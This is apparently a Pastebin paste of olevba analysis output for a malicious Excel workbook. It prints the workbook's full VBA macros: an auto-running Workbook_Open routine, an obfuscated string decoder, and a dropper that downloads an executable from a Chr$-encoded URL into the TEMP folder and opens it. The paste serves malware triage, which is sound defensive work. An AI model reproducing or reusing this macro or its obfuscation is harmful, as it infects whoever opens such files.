Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS---- inv86-~1.xls
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: inv86-~1.xls
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ÝòàÊíèãà.cls
- in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Workbook_Open()
- atqk_x482mp6v
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+---------------+----------------------------------------+
- | Type | Keyword | Description |
- +----------+---------------+----------------------------------------+
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- +----------+---------------+----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò1.cls
- in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò2.cls
- in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò3.cls
- in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class2.cls
- in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO ÀàâïàâïÀÀ.bas
- in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u0410\u0430\u0432\u043f\u0430\u0432\u043f\u0410\u0410'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function tIBlTVqSYlvQeRDfBAc(VdkAbaqgjbz As String) As String
- For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
- tIBlTVqSYlvQeRDfBAc = tIBlTVqSYlvQeRDfBAc & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
- Next
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Class3.cls
- in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class4.cls
- in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class5.cls
- in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO ûâàûâÀÀâà.bas
- in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u044b\u0432\u0430\u044b\u0432\u0410\u0410\u0432\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then
- Private Declare PtrSafe Function ãøÏÍØûâàà Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
- ByVal ÏÑðïñïñïïÎàï As String, _
- ByVal ÏÑðïñïñïïÎàïf As String, _
- ByVal ÏÑðïñïñïïÎàïfd As Long, _
- ByVal ÏÑðïñïñïïÎàïfds As LongPtr) As LongPtr
- #Else
- Private Declare Function ãøÏÍØûâàà Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
- ByVal ÏÑðïñïñïïÎàï As String, _
- ByVal ÏÑðïñïñïïÎàïf As String, _
- ByVal ÏÑðïñïñïïÎàïfd As Long, _
- ByVal ÏÑðïñïñïïÎàïfds As Long) As Long
- #End If
- Sub atqk_x482mp6v()
- ðïîðïÀàâïàâï tIBlTVqSYlvQeRDfBAc(Chr$(104) & Chr$(43) & Chr$(116) & Chr$(83) & Chr$(116) & Chr$(38) & Chr$(112) & Chr$(47) & Chr$(58) & Chr$(73) & Chr$(47) & Chr$(93) & Chr$(47) & Chr$(134) & Chr$(48) & Chr$(60) & Chr$(51) & Chr$(35) & Chr$(52) & Chr$(109) & Chr$(48) & Chr$(61) & Chr$(52) & Chr$(104) & Chr$(101) & Chr$(102) & Chr$(98) & Chr$(56) & Chr$(46) & Chr$(120) & Chr$(110) & Chr$(54) & Chr$(101) & Chr$(126) & Chr$(116) & Chr$(134) & Chr$(115) & Chr$(84) & Chr$(111) & Chr$(35) & Chr$(108) & Chr$(56) & Chr$(104) & Chr$(45) & Chr$(111) & Chr$(80) & Chr$(115) & Chr$(74) & Chr$(116) & Chr$(118) & Chr$(46) & Chr$(60) & Chr$(99) & Chr$(107) & Chr$(111) & Chr$(92) & Chr$(109) & Chr$(84) & Chr$(47) & Chr$(107) & Chr$(106) & Chr$(40) & Chr$(115) & Chr$(68) & Chr$(47) & Chr$(109) & Chr$(98) & Chr$(86) & Chr$(105) & Chr$(104) & Chr$(110) & Chr$(49) & Chr$(46) & Chr$(39) & Chr$(101) _
- & Chr$(96) & Chr$(120) & Chr$(99) & Chr$(101) & Chr$(62)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
- 109) & Chr$(80) & Chr$(123))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))
- End Sub
- Function ðïîðïÀàâïàâï(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
- ïëðïÀÀàâïï = ãøÏÍØûâàà(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
- Set ûâàÀÀâûàûâà = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
- ûâàÀÀâûàûâà.Open Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement